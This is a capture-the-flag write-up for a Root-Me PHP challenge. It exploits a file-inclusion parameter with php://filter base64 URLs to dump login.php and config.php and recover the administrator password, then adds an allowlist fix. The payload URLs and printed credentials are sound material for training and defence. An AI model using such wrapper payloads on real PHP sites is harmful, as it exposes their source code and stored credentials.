PHP - Filters
- Points: 25
- Link: https://www.root-me.org/en/Challenges/Web-Server/PHP-Filters
Statement
Retrieve the administrator password of this application.
Solution
Click the login button and look at the URL:
http://challenge01.root-me.org/web-serveur/ch12/?inc=login.php
So $inc = $_GET['inc'] is used to request a page. I guess the file_get_contents($inc) or include($inc) function must have been used.
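Try PHP conversion filters to get the page's PHP code. With convert.base64-encode the file arrives as base64 text, so even include($inc) prints it instead of executing it: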
http://challenge01.root-me.org/web-serveur/ch12/?inc=php://filter/convert.base64-encode/resource=login.php
It works!
We get PHP code encoded in base64. Decode it and there it is, the PHP code:
```php
<?php
include("config.php");
if ( isset($_POST["username"]) && isset($_POST["password"]) ){
    if ($_POST["username"]==$username && $_POST["password"]==$password){
        print("<h2>Welcome back !</h2>");
        print("To validate the challenge use this password<br/><br/>");
    } else {
        print("<h3>Error : no such user/password</h2><br />");
    }
} else {
?>
<form action="" method="post">
    Login <br/>
    <input type="text" name="username" /><br/><br/>
    Password <br/>
    <input type="password" name="password" /><br/><br/>
    <br/><br/>
    <input type="submit" value="connect" /><br/><br/>
</form>
<?php } ?>
```
The challenge says:
print("To validate the challenge use this password<br/><br/>");
So we need to find the password.
There is another file, config.php. The password may be in that file. Now we will read it:
http://challenge01.root-me.org/web-serveur/ch12/?inc=php://filter/convert.base64-encode/resource=config.php
```php
<?php
$username="admin";
$password="DAPt9D2mky0APAF";
```
The flag is
DAPt9D2mky0APAF
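One way to close the hole this write-up relies on, shown as an added example that is not the challenge's code: the inc parameter selects a key from a fixed allowlist instead of reaching include() as a path. The PAGES map, the pages/ directory, the home page and the resolve_page() helper are assumptions made for illustration.

```php
<?php
// Added example, not the challenge's code. PAGES, pages/ and resolve_page()
// are hypothetical names chosen for this sketch.

// Pattern the write-up infers: the parameter reaches include() unchanged,
// so stream wrappers such as php://filter are honoured.
//   include($_GET['inc']);

// Hardened form: the request picks a key, never a path or a wrapper.
// config.php is deliberately absent from the map.
const PAGES = [
    'login' => 'login.php',
    'home'  => 'home.php',
];

function resolve_page(?string $inc): ?string
{
    if ($inc === null) {
        return null;
    }
    // Accept "login" as well as the "login.php" form seen in the URL.
    $key = (string) preg_replace('/\.php$/', '', $inc);
    if (!array_key_exists($key, PAGES)) {
        return null; // wrappers, traversal and unlisted files end here
    }
    return __DIR__ . '/pages/' . PAGES[$key];
}

// In the page itself (sketch):
//   $file = resolve_page($_GET['inc'] ?? null);
//   if ($file === null) { http_response_code(404); exit; }
//   include $file;

// Constructed sample inputs, including the two requests from the write-up.
$samples = [
    'login.php',
    'php://filter/convert.base64-encode/resource=login.php',
    'php://filter/convert.base64-encode/resource=config.php',
    'config.php',
    '../config.php',
];
foreach ($samples as $sample) {
    printf("%-56s => %s\n", $sample, resolve_page($sample) ?? 'rejected');
}
```

Keeping config.php outside the directory that pages are served from adds a second layer: even a mistake in the map cannot expose the credentials file.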
This post is licensed under CC BY 4.0 by the author.